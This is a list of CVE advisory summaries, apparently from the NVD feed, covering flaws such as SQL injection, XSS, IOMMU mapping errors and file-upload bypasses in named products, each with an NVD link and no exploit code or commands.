CVE-2022-26360 IOMMU: RMRR (VT-d) and unity map (AMD-Vi) handling issues T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Certain PCI devices in a system might be assigned Reserved Memory Regions (specified via Reserved Memory Region Reporting, "RMRR") for Intel VT-d or Unity Mapping ranges for AMD-Vi. These are typically used for platform tasks such as legacy USB emulation. Since the precise purpose of these regions is unknown, once a device associated with such a region is active, the mappings of these regions need to remain continuouly accessible by the device. This requirement has been violated. Subsequent DMA or interrupts from the device may have unpredictable behaviour, ranging from IOMMU faults to memory corruption. https://nvd.nist.gov/vuln/detail/CVE-2022-26360
CVE-2022-26361 IOMMU: RMRR (VT-d) and unity map (AMD-Vi) handling issues T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Certain PCI devices in a system might be assigned Reserved Memory Regions (specified via Reserved Memory Region Reporting, "RMRR") for Intel VT-d or Unity Mapping ranges for AMD-Vi. These are typically used for platform tasks such as legacy USB emulation. Since the precise purpose of these regions is unknown, once a device associated with such a region is active, the mappings of these regions need to remain continuouly accessible by the device. This requirement has been violated. Subsequent DMA or interrupts from the device may have unpredictable behaviour, ranging from IOMMU faults to memory corruption. https://nvd.nist.gov/vuln/detail/CVE-2022-26361
CVE-2021-41245 Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.6 and 3.0.0, CSRF tokens generated by `privUITransactionFile` aren't properly checked. Versions 2.7.6 and 3.0.0 contain a patch for this issue. As a workaround, use the session implementation by adding in the iTop config file. https://nvd.nist.gov/vuln/detail/CVE-2021-41245
CVE-2022-1243 CRHTLF can lead to invalid protocol extraction potentially leading to XSS in GitHub repository medialize/uri.js prior to 1.19.11. https://nvd.nist.gov/vuln/detail/CVE-2022-1243
CVE-2022-26982 SimpleMachinesForum 2.1.1 and earlier allows remote authenticated administrators to execute arbitrary code by inserting a vulnerable php code because the themes can be modified by an administrator. https://nvd.nist.gov/vuln/detail/CVE-2022-26982
CVE-2022-26986 SQL Injection in ImpressCMS 1.4.3 and earlier allows remote attackers to inject into the code in unintended way, this allows an attacker to read and modify the sensitive information from the database used by the application. If misconfigured, an attacker can even upload a malicious web shell to compromise the entire system. https://nvd.nist.gov/vuln/detail/CVE-2022-26986
CVE-2020-19229 Jeesite 1.2.7 uses the apache shiro version 1.2.3 affected by CVE-2016-4437. Because of this version of the java deserialization vulnerability, an attacker could exploit the vulnerability to execute arbitrary commands via the rememberMe parameter. https://nvd.nist.gov/vuln/detail/CVE-2020-19229
CVE-2020-23349 An intent redirection issue was doscovered in Sina Weibo Android SDK 4.2.7 (com.sina.weibo.sdk.share.WbShareTransActivity), any unexported Activities could be started by the com.sina.weibo.sdk.share.WbShareTransActivity. https://nvd.nist.gov/vuln/detail/CVE-2020-23349
CVE-2020-28847 Cross Site Scripting (XSS) vulnerability in xCss Valine v1.4.14 via the nick parameter to /classes/Comment. https://nvd.nist.gov/vuln/detail/CVE-2020-28847
CVE-2021-27116 An issue was discovered in file profile.go in function MemProf in beego through 2.0.2, allows attackers to launch symlink attacks locally. https://nvd.nist.gov/vuln/detail/CVE-2021-27116
CVE-2021-27117 An issue was discovered in file profile.go in function GetCPUProfile in beego through 2.0.2, allows attackers to launch symlink attacks locally. https://nvd.nist.gov/vuln/detail/CVE-2021-27117
CVE-2021-28428 File upload vulnerability in HorizontCMS before 1.0.0-beta.3 via uploading a .htaccess and *.hello files using the Media Files upload functionality. The original file upload vulnerability (CVE-2020-27387) was remediated by restricting the PHP extensions; however, we confirmed that the filter was bypassed via uploading an arbitrary .htaccess and *.hello files in order to execute PHP code to gain RCE. https://nvd.nist.gov/vuln/detail/CVE-2021-28428
CVE-2021-30080 An issue was discovered in the route lookup process in beego through 2.0.1, allows attackers to bypass access control. https://nvd.nist.gov/vuln/detail/CVE-2021-30080
CVE-2021-41751 Buffer overflow vulnerability in file ecma-builtin-array-prototype.c:909 in function ecma_builtin_array_prototype_object_slice in Jerryscript before commit e1ce7dd7271288be8c0c8136eea9107df73a8ce2 on Oct 20, 2021. https://nvd.nist.gov/vuln/detail/CVE-2021-41751
CVE-2021-41752 Stack overflow vulnerability in Jerryscript before commit e1ce7dd7271288be8c0c8136eea9107df73a8ce2 on Oct 20, 2021 due to an unbounded recursive call to the new opt() function. https://nvd.nist.gov/vuln/detail/CVE-2021-41752
CVE-2022-0602 Cross-site Scripting (XSS) - DOM in GitHub repository tastyigniter/tastyigniter prior to 3.3.0. https://nvd.nist.gov/vuln/detail/CVE-2022-0602
CVE-2022-24795 yajl-ruby is a C binding to the YAJL JSON parsing and generation library. The 1.x branch and the 2.x branch of `yajl` contain an integer overflow which leads to subsequent heap memory corruption when dealing with large (~2GB) inputs. The reallocation logic at `yajl_buf.c#L64` may result in the `need` 32bit integer wrapping to 0 when `need` approaches a value of 0x80000000 (i.e. ~2GB of data), which results in a reallocation of buf->alloc into a small heap chunk. These integers are declared as `size_t` in the 2.x branch of `yajl`, which practically prevents the issue from triggering on 64bit platforms, however this does not preclude this issue triggering on 32bit builds on which `size_t` is a 32bit integer. Subsequent population of this under-allocated heap chunk is based on the original buffer size, leading to heap memory corruption. This vulnerability mostly impacts process availability. Maintainers believe exploitation for arbitrary code execution is unlikely. A patch is available and anticipated to be part of yajl-ruby version 1.4.2. As a workaround, avoid passing large inputs to YAJL. https://nvd.nist.gov/vuln/detail/CVE-2022-24795
CVE-2022-27462 Cross Site Scripting (XSS) vulnerability in objects/function.php in function getDeviceID in WWBN AVideo through 11.6, via the yptDevice parameter to view/include/head.php. https://nvd.nist.gov/vuln/detail/CVE-2022-27462
CVE-2022-27463 Open redirect vulnerability in objects/login.json.php in WWBN AVideo through 11.6, allows attackers to arbitrarily redirect users from a crafted url to the login page. https://nvd.nist.gov/vuln/detail/CVE-2022-27463
CVE-2022-22355 IBM MQ Appliance 9.2 CD and 9.2 LTS are vulnerable to a denial of service in the Login component of the application which could allow an attacker to cause a drop in performance. https://nvd.nist.gov/vuln/detail/CVE-2022-22355
CVE-2022-22356 IBM MQ Appliance 9.2 CD and 9.2 LTS could allow an attacker to enumerate account credentials due to an observable discrepancy in valid and invalid login attempts. IBM X-Force ID: 220487. https://nvd.nist.gov/vuln/detail/CVE-2022-22356
CVE-2022-26635 PHP-Memcached v2.2.0 and below contains an improper NULL termination which allows attackers to execute CLRF injection. https://nvd.nist.gov/vuln/detail/CVE-2022-26635
CVE-2022-26630 Jellycms v3.8.1 and below was discovered to contain an arbitrary file upload vulnerability via \\app.\\admin\\Controllers\\db.php. https://nvd.nist.gov/vuln/detail/CVE-2022-26630
CVE-2022-28648 In JetBrains YouTrack before 2022.1.43563 HTML code from the issue description was being rendered https://nvd.nist.gov/vuln/detail/CVE-2022-28648
CVE-2022-28649 In JetBrains YouTrack before 2022.1.43563 it was possible to include an iframe from a third-party domain in the issue description https://nvd.nist.gov/vuln/detail/CVE-2022-28649
CVE-2022-28650 In JetBrains YouTrack before 2022.1.43700 it was possible to inject JavaScript into Markdown in the YouTrack Classic UI https://nvd.nist.gov/vuln/detail/CVE-2022-28650
CVE-2022-28651 In JetBrains IntelliJ IDEA before 2021.3.3 it was possible to get passwords from protected fields https://nvd.nist.gov/vuln/detail/CVE-2022-28651
CVE-2022-1244 heap-buffer-overflow in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability is capable of inducing denial of service. https://nvd.nist.gov/vuln/detail/CVE-2022-1244
CVE-2022-24780 Combodo iTop is a web based IT Service Management tool. In versions prior to 2.7.6 and 3.0.0, users of the iTop user portal can send TWIG code to the server by forging specific http queries, and execute arbitrary code on the server using http server user privileges. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds. https://nvd.nist.gov/vuln/detail/CVE-2022-24780
CVE-2022-24811 Combodi iTop is a web based IT Service Management tool. Prior to versions 2.7.6 and 3.0.0, cross-site scripting is possible for scripts outside of script tags when displaying HTML attachments. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds. https://nvd.nist.gov/vuln/detail/CVE-2022-24811
CVE-2022-24978 Zoho ManageEngine ADAudit Plus before 7055 allows authenticated Privilege Escalation on Integrated products. This occurs because a password field is present in a JSON response. https://nvd.nist.gov/vuln/detail/CVE-2022-24978
CVE-2022-25245 Zoho ManageEngine ServiceDesk Plus before 13001 allows anyone to know the organisation's default currency name. https://nvd.nist.gov/vuln/detail/CVE-2022-25245
CVE-2022-25373 Zoho ManageEngine SupportCenter Plus before 11020 allows Stored XSS in the request history. https://nvd.nist.gov/vuln/detail/CVE-2022-25373
CVE-2022-28219 Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution. https://nvd.nist.gov/vuln/detail/CVE-2022-28219
CVE-2022-23974 In 0.9.3 or older versions of Apache Pinot segment upload path allowed segment directories to be imported into pinot tables. In pinot installations that allow open access to the controller a specially crafted request can potentially be exploited to cause disruption in pinot service. Pinot release 0.10.0 fixes this. See https://docs.pinot.apache.org/basics/releases/0.10.0 https://nvd.nist.gov/vuln/detail/CVE-2022-23974
CVE-2022-26628 Matrimony v1.0 was discovered to contain a SQL injection vulnerability via the Password parameter. https://nvd.nist.gov/vuln/detail/CVE-2022-26628
CVE-2022-27123 Employee Performance Evaluation v1.0 was discovered to contain a SQL injection vulnerability via the email parameter. https://nvd.nist.gov/vuln/detail/CVE-2022-27123
CVE-2022-27124 Insurance Management System 1.0 was discovered to contain a SQL injection vulnerability via the username parameter. https://nvd.nist.gov/vuln/detail/CVE-2022-27124
CVE-2022-27304 Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via the user parameter. https://nvd.nist.gov/vuln/detail/CVE-2022-27304
CVE-2022-28115 Online Sports Complex Booking v1.0 was discovered to contain a SQL injection vulnerability via the id parameter. https://nvd.nist.gov/vuln/detail/CVE-2022-28115
CVE-2022-28116 Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter. https://nvd.nist.gov/vuln/detail/CVE-2022-28116
CVE-2022-28467 Online Student Admission v1.0 was discovered to contain a SQL injection vulnerability via the txtapplicationID parameter. https://nvd.nist.gov/vuln/detail/CVE-2022-28467
CVE-2022-28468 Payroll Management System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter. https://nvd.nist.gov/vuln/detail/CVE-2022-28468